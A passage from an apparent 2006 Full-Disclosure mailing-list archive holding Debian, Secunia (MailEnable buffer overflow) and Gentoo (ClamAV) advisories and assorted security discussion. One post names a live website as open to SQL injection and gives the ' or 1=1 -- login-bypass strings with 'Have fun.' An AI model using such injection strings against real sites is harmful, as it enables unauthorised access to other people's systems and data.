    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme16x_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2397324 f716f0313d88c62779569712078ae0c8
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-q40_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2262406 c0c6fbb7a1160688f8e8c7ae97d43e9a
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_m68k.deb
      Size/MD5 checksum:    16338 f9b14151760944376dfbbbfc47b73346


  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-headers-2.4.27-2_2.4.27-2sarge1_s390.deb
      Size/MD5 checksum:  4578000 97fce93cc2ebc4da7c0a7bab1c157aef
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-headers-2.4.27-3_2.4.27-2sarge5_s390.deb
      Size/MD5 checksum:  4579864 fc815cfb54bdfed711c2c09fae740500
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-2-s390_2.4.27-2sarge1_s390.deb
      Size/MD5 checksum:  2774574 86262b4b2bb4c6db5471c97dcc1747b4
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-2-s390-tape_2.4.27-2sarge1_s390.deb
      Size/MD5 checksum:   991868 a712b00ecf74c79fadeeb0f50b298618
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-2-s390x_2.4.27-2sarge1_s390.deb
      Size/MD5 checksum:  2966354 5ebdd9b9fa80cdbdf0049683eaad24ee
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390_2.4.27-2sarge5_s390.deb
      Size/MD5 checksum:  2782140 11029023c05ea13dc51206e74bdb2391
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390-tape_2.4.27-2sarge5_s390.deb
      Size/MD5 checksum:   995678 a642f56da45718fe0a665ad1836f6112
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390x_2.4.27-2sarge5_s390.deb
      Size/MD5 checksum:  2974550 749696ce8a74c220819579cb14ebff3a
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_s390.deb
      Size/MD5 checksum:    19338 c86219a43c645a82ee1782d94dc6dce8


  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-build-2.4.27-2_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:     8328 1e092e0877937ac5dbf46e347992c7d3
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-build-2.4.27-3_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:    10550 164dc9869ea386fd3169864645d89a98
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-2_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:  2023482 b50d08e5c4c12fff4473e77babeda1ab
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-2-sparc32_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:   162670 2c495f6b6e414dc24f2c676ecd84dda4
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-2-sparc32-smp_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:   164478 f59e33098dec7e1ff68b162aab6d56a6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-2-sparc64_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:   201214 fa92988ddfba0e9f03ace13f365dfc77
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-2-sparc64-smp_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:   202452 d56ab1dd8ddb9d4b10de13c37c4c4af5
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:  2025304 c036f26f3bb2c1a7f1acc7588b54c389
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc32_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:   164532 18adb86c0d3ce5b6424b277ce2e39794
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc32-smp_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:   166318 d3fa63eab9ddab3f6b5db8f385ffe458
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc64_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:   202940 c03ec973495d21f03df3f156c3dc033b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc64-smp_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:   204266 547fb57dd64584ee765c427d2c0554fd
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-2-sparc32_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:  3597102 1c5334adb92bbaf0ce96e82abcf6d77e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-2-sparc32-smp_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:  3784076 3d1b5e5c3e147bf760c6077fa36eb783
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-2-sparc64_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:  6377902 7bd0e77ec9494b0ed352917b829fa5a0
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-2-sparc64-smp_2.4.27-9sarge1_sparc.deb
      Size/MD5 checksum:  6543220 a73b077777c3a22ca9538666d3ff8aee
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc32_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:  3605072 14ac1e3ce17cbf64bfd7a61f520cf494
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc32-smp_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:  3792788 38ef858c0ff9158cf44590782f5664e0
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc64_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:  6385736 5dfaf6a6a6e5a809a38458ef79661d3b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc64-smp_2.4.27-9sarge5_sparc.deb
      Size/MD5 checksum:  6550182 97b6ef3ce231c448687bf357daae4faf
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_sparc.deb
      Size/MD5 checksum:    18200 1465507e83184c1c32b2015530dc39c9


  AMD64 architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_amd64.deb
      Size/MD5 checksum:    17252 8c0ddf9b2b2c5f7ac695d7f10af7aeb5


  HP Precision architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_hppa.deb
      Size/MD5 checksum:    19334 22608a5cbf78b9dfb49a91685513485e


  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge4.040815-2_mips.deb
      Size/MD5 checksum:  4681544 e5ad300c16978417dfdb04a55b3cf505
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-ip22_2.4.27-10.sarge4.040815-2_mips.deb
      Size/MD5 checksum:  3854770 6fb17fc57af59997c55dc5d15fe86324
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-ip22_2.4.27-10.sarge4.040815-2_mips.deb
      Size/MD5 checksum:  3857642 135e1590f21c14db5765422dadd03571
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge4.040815-2_mips.deb
      Size/MD5 checksum:  7186300 c841f01587ec79fc411bda056d663a04
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_mips.deb
      Size/MD5 checksum:    20448 02fd1e80e83a5c3e7b6b16832b77cc26


  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  4686676 eb7e81b8a3a6829252a02251aed92b08
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r3k-kn02_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  3037974 ea0208a51612c1e34a6aa60410d21c3d
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-kn04_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  2999656 ec0c25c38b5e7a8a65142bbc52b8220d
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-cobalt_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  4107630 deefd96c7f6b2e3e954c98284d367e61
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-lasat_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  2141986 e3ea6afd27d393fcdf6b20a755fa7a41
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  7048130 dd624bc0af5d1e39be9084a58ad575d5
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-xxs1500_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:  4677566 6179a00efde69e2bef158f584b667bc9
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_mipsel.deb
      Size/MD5 checksum:    20488 41476ba7fba16f7453c72fad3ac7279a


  PowerPC architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-apus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:   143604 dbd3e6559ab4d24640e78fa5096b8d4d
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-nubus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:   143402 0ac835db06b6feb1b662ffe7cee6b1ca
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:   157358 df24d8751cee33c2ec3490fe3c58aab5
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-small_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:   157652 f95e05ad17a85a314f36ad794231bd19
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-smp_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:   157408 19f3fa73f641f93a734b5a0c1d92800a
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-apus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:  4684386 33f89f6ff68d4697590dc56da8f5c85b
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-nubus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:  4694600 0d7e24209c0c22ad726ddc7d2046f5e4
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-powerpc_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:  4802248 dc4bb7170432243f61d1ccf10820518f
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-apus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:  2502696 794593451ab3047561014f148290650c
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-nubus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:  1819296 026d70d2989c1f5345280777f8430d33
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum: 13486360 c02196059ed6f7103d6faa2a45320828
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-small_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum: 12759400 e9108a2f987765ff915435b199bda15e
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-smp_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum: 13792416 3af28a8ab21e298043311c0e15b19184
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-apus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:    65868 b0f73596dd19e6c41d0fa64f5c3d7e22
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-nubus_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:    11006 c537fc249b24e8d4c57165e6f4d6ad5a
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-powerpc_2.4.27-10sarge5_powerpc.deb
      Size/MD5 checksum:    10928 11f29b35752d4f50ea28b345001efb2b
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_powerpc.deb
      Size/MD5 checksum:    18902 a8338f398511cd07bd619b812f18d76b

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFhU8VXm3vHE4uyloRAqyaAJoCjTG8pCP4OuaLqSRiqr2F/TIh0QCg0oNv
cX7kv9vIm6CBHm4dJqv7whM=
=e1p5
-----END PGP SIGNATURE-----



From crewxsecurity at googlemail.com  Sun Dec 17 20:13:43 2006
From: crewxsecurity at googlemail.com (Crew-X Security)
Date: Sun, 17 Dec 2006 20:13:43 +0000
Subject: [Full-disclosure] 0-day hackers are vista-ready
Message-ID: <5e261ec0612171213u3a0f3a8dk65af280494bdb26c@mail.gmail.com>

hai

fun begins DEC-18-2006

;)



From caojunsccd at sina.com  Mon Dec 18 08:41:40 2006
From: caojunsccd at sina.com (caojunsccd)
Date: Mon, 18 Dec 2006 16:41:40 +0800
Subject: [Full-disclosure] Who call talk about the heuristic tech of norton?
Message-ID: <200612181641401408469@sina.com>

   Especially in checking office files?




caojunsccd
2006-12-18
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/8a5c5acc/attachment.html 

From Valdis.Kletnieks at vt.edu  Mon Dec 18 15:53:03 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 18 Dec 2006 10:53:03 -0500
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: Your message of "Sat, 16 Dec 2006 17:55:50 GMT."
	<002e01c7213b$6cdabc90$0200a8c0@AMD2500>
References: <1FA45C2E5F2E4B46967415DA3A804FE88125D9@mail.greenborder.com>
	<002e01c7213b$6cdabc90$0200a8c0@AMD2500>
Message-ID: <200612181553.kBIFr3hZ031168@turing-police.cc.vt.edu>

On Sat, 16 Dec 2006 17:55:50 GMT, Aaron Gray said:
>
> >- Disassembling Vista Security
> 
> This is illegal. So not a very good idea for the thesis.

This of course is *very* dependent on what country you are in.

In the US, the most important law involved would probably be the DMCA,
which *does* have an exception for reverse engineering for compatibility
research (17 USC 1201(f)), encryption research (17 USC 1201(g)), and
security testing (17 USC 1201(j)).

http://www.law.cornell.edu/uscode/html/uscode17/usc_sec_17_00001201----000-.html

Note that 17 USC 1201(j)(2) *specifically* hints that you *really* want
an in-writing "Get Out Of Jail Free" card for 18 USC 1030 and related.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/e38d1d76/attachment.bin 

From bsdusr at gmail.com  Mon Dec 18 14:20:25 2006
From: bsdusr at gmail.com (afed)
Date: Mon, 18 Dec 2006 09:20:25 -0500
Subject: [Full-disclosure] 0-day hackers are vista-ready
In-Reply-To: <5e261ec0612171213u3a0f3a8dk65af280494bdb26c@mail.gmail.com>
References: <5e261ec0612171213u3a0f3a8dk65af280494bdb26c@mail.gmail.com>
Message-ID: <6fc7f7320612180620t731e8e65w8b4c8e0e9b1dae94@mail.gmail.com>

God hates Vista!  Thank god for 0-day!  Vista apologists and enablers
will burn in hell.  GOD will smite them.

On 12/17/06, Crew-X Security  wrote:
> hai
>
> fun begins DEC-18-2006
>
> ;)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From remove-vuln at secunia.com  Mon Dec 18 14:53:46 2006
From: remove-vuln at secunia.com (Secunia Research)
Date: Mon, 18 Dec 2006 15:53:46 +0100
Subject: [Full-disclosure] Secunia Research: MailEnable POP Service "PASS"
	Command Buffer	Overflow
Message-ID: <1166453626.24553.315.camel@ts4.intnet>

====================================================================== 

                     Secunia Research 18/12/2006

      - MailEnable POP Service "PASS" Command Buffer Overflow -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* MailEnable Enterprise Edition 2.35
* MailEnable Professional Edition 2.35

NOTE: Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Highly critical
Impact: System Compromise
Where:  Remote

====================================================================== 
3) Vendor's Description of Software 

"MailEnable's mail server software provides a powerful, scalable
hosted messaging platform for Microsoft Windows. MailEnable? offers
stability, unsurpassed flexibility and an extensive feature set which
allows you to provide cost-effective mail services".

Product Link:
http://mailenable.com/

====================================================================== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in MailEnable, which
can be exploited by malicious people to compromise a vulnerable
system.

The vulnerability is caused due to a boundary error in the POP service
when handling arguments passed to the "PASS" command. This can be
exploited to cause a stack-based buffer overflow by passing an overly
long, specially crafted string as argument to the affected command.

Successful exploitation allows execution of arbitrary code.

====================================================================== 
5) Solution 

Apply hotfix:
http://www.mailenable.com/hotfix/ME-10026.EXE

====================================================================== 
6) Time Table 

18/12/2006 - Vendor notified.
18/12/2006 - Vendor response and hotfix released.
18/12/2006 - Public disclosure.

====================================================================== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

====================================================================== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-6605 for the vulnerability.

====================================================================== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below to
see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

====================================================================== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-75/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================





From saudi at hotmail.fr  Mon Dec 18 11:34:34 2006
From: saudi at hotmail.fr (saudi arabia)
Date: Mon, 18 Dec 2006 11:34:34 +0000
Subject: [Full-disclosure] RateMe <= all versions => ( main.inc.php ) Remote
	File Include Vulnerability
Message-ID: 

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/3d390d7f/attachment.html 
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: RateMe Remote file include vulnerability.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/3d390d7f/attachment.txt 

From tim-security at sentinelchicken.org  Mon Dec 18 16:50:26 2006
From: tim-security at sentinelchicken.org (Tim)
Date: Mon, 18 Dec 2006 11:50:26 -0500
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>
References: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>
Message-ID: <20061218165026.GB3230@sentinelchicken.org>

> Hello everyone, sorry for wasting your bandwidth

You couldn't be any worse than than the kiddies...

> I'm currently trying to find an interesting topic in computer networking
> security for my master degree thesis, I've read a lot of jurnal that related
> with computer networking and security. All journal seem to advanced for me,
> sometimes the journal has mathematical formula that I don't understand what
> is the point for. Maybe someone here willing to help me? an idea? or another
> journal website?


I recently finished up an MS thesis in security.  When I was trying to
narrow down a topic, I was told that the final paper should have at
least one *original* idea.  Generally this idea is something somewhat
mathematical, and something you can apply to the problem at hand.  It
may also be an original application of established mathematical
principles to a problem of interest.  Some of the suggestions of other
posters are highly specialized to a here-today-gone-tomorrow topic... if
you focus on one of those, you'll have a much harder time coming up with
a good original idea that your advisors will be happy with.

My advice is to try and find a big problem in security that is long from
being solved, and try to bite off a small piece of it.  Find out what
others have done to try and solve the problem, figure out why those
approaches are insufficient due to complexity/cost/etc, and try to
improve on it with a novel technique.

good luck,
tim



From fabior2 at gmail.com  Mon Dec 18 16:29:35 2006
From: fabior2 at gmail.com (Fabio Neves Sarmento [ Gmail ])
Date: Mon, 18 Dec 2006 14:29:35 -0200
Subject: [Full-disclosure] SQL Injection - Vulnerable Brazilian Website (
	AJAX / Web 2.0 )
Message-ID: <4bb6f2de0612180829k70e34c2s6fc916ad09b33acb@mail.gmail.com>

Hello folks!!

This is the website. ( SQL Injection vulnerability )
Website deloped using web 2.0 concept, very very same as Google tools

http://www.misgood.com

USER: ' or 1=1 --
PASS: ' or 1=1 --

get logged! now you will see the first ID in the system.
Have fun.

 - Quik
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/66b3e776/attachment.html 

From jaervosz at gentoo.org  Mon Dec 18 19:42:19 2006
From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen)
Date: Mon, 18 Dec 2006 20:42:19 +0100
Subject: [Full-disclosure] [ GLSA 200612-18 ] ClamAV: Denial of Service
Message-ID: <200612182042.24563.jaervosz@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ClamAV: Denial of Service
      Date: December 18, 2006
      Bugs: #157698
        ID: 200612-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

ClamAV is vulnerable to Denial of Service.

Background
==========

ClamAV is a GPL virus scanner.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav      < 0.88.7                      >= 0.88.7

Description
===========

Hendrik Weimer discovered that ClamAV fails to properly handle deeply
nested MIME multipart/mixed content.

Impact
======

By sending a specially crafted email with deeply nested MIME
multipart/mixed content an attacker could cause ClamAV to crash.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ClamAV users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.88.7"

References
==========

  [ 1 ] CVE-2006-6481
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6481

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/8265e732/attachment.bin 

From nguyen.petronius at gmail.com  Mon Dec 18 18:11:06 2006
From: nguyen.petronius at gmail.com (Nguyen Pham)
Date: Mon, 18 Dec 2006 19:11:06 +0100
Subject: [Full-disclosure] emergent security properties
Message-ID: 

Hi list,

An emergent behavior or property can appear when a number of simple entities
operate in an environment, forming more complex behaviors as a collective.
The property itself is often unpredictable and unprecedented, and is not a
property of any such single entity: it is irreducible.

In real world, we can have many examples of these properties such as the
shape of a flock of birds or shoal of fish. The problem is that I can hardly
find out some real examples in the field of network security in terms of
sub-networks, firewalls, servers, applications, etc. with their
corresponding security properties.

For example, the overall security of the system S is (SS1, SS2, a, b, c)
with the security of its sub-systems SS1, SS2 are SS1 = (SSS3, c, d), SS2 =
(SSS2, e, f, g), etc. Here, the properties "a" and "b" are new formed ones
when SS1 and SS2 are placed in the context of system S.

Could you give me some examples on that?

Thanks in advance.
Nguyen Pham.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061218/7139aea1/attachment.html 

From tim-security at sentinelchicken.org  Mon Dec 18 20:04:28 2006
From: tim-security at sentinelchicken.org (Tim)
Date: Mon, 18 Dec 2006 15:04:28 -0500
Subject: [Full-disclosure] emergent security properties
In-Reply-To: 
References: 
Message-ID: <20061218200428.GD3230@sentinelchicken.org>

> In real world, we can have many examples of these properties such as the
> shape of a flock of birds or shoal of fish. The problem is that I can hardly
> find out some real examples in the field of network security in terms of
> sub-networks, firewalls, servers, applications, etc. with their
> corresponding security properties.
>
> ...
>
> Could you give me some examples on that?


I can't think of any examples in the defense side of the house, but
certainly viruses can exhibit these emergent properties.  The slammer
worm did nothing explicitly malicious to any machines.  It spread in
memory only, not touching disk, and did not attempt to phone home or
otherwise do explicitly malicious actions.

However, it did take down much of the internet, in what, 11 minutes?
The emergent result of it's spread was catastrophic failure.  Based on
what I understand of emergent behavior, this fits the bill.  I'd be
interested to hear if you disagree.

Viruses communicating with one another, autonomously, would be a very
interesting area of study.  I believe some vague doomsday articles are
out there on this topic.

cheers,
tim



From simon at snosoft.com  Mon Dec 18 21:07:13 2006
From: simon at snosoft.com (Simon Smith)
Date: Mon, 18 Dec 2006 16:07:13 -0500
Subject: [Full-disclosure] SinFP OS fingerprinting online demo
In-Reply-To: <41011d980612140117s373fd440n94b80c654cd4bfb6@mail.gmail.com>
Message-ID: 

So where's the source code for this?


On 12/14/06 4:17 AM, "crazy frog crazy frog" 
wrote:

> works fine for me :)
> 
> 
> On 12/14/06, Simon Smith  wrote:
>> Doesn't seem to work man ;P
>> 
>> 
>> On 12/13/06 10:08 AM, "fd at gomor.org"  wrote:
>> 
>>> Sorry, I forgot to mention that a benchmark versus Nmap has
>>> been done by someone on his blog:
>>> 
>>> http://www.computerdefense.org/?p=173
>> 
>> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> 
> 




From fd at gomor.org  Mon Dec 18 21:49:57 2006
From: fd at gomor.org (GomoR)
Date: Mon, 18 Dec 2006 22:49:57 +0100
Subject: [Full-disclosure] SinFP OS fingerprinting online demo
In-Reply-To: 
References: <41011d980612140117s373fd440n94b80c654cd4bfb6@mail.gmail.com>
	
Message-ID: <20061218214957.GA30068@oshima.enslaved.lan>

On Mon, Dec 18, 2006 at 04:07:13PM -0500, Simon Smith wrote:
> So where's the source code for this?

Well, the source code is where you can find it, by just 
typing sinfp into Google search field:

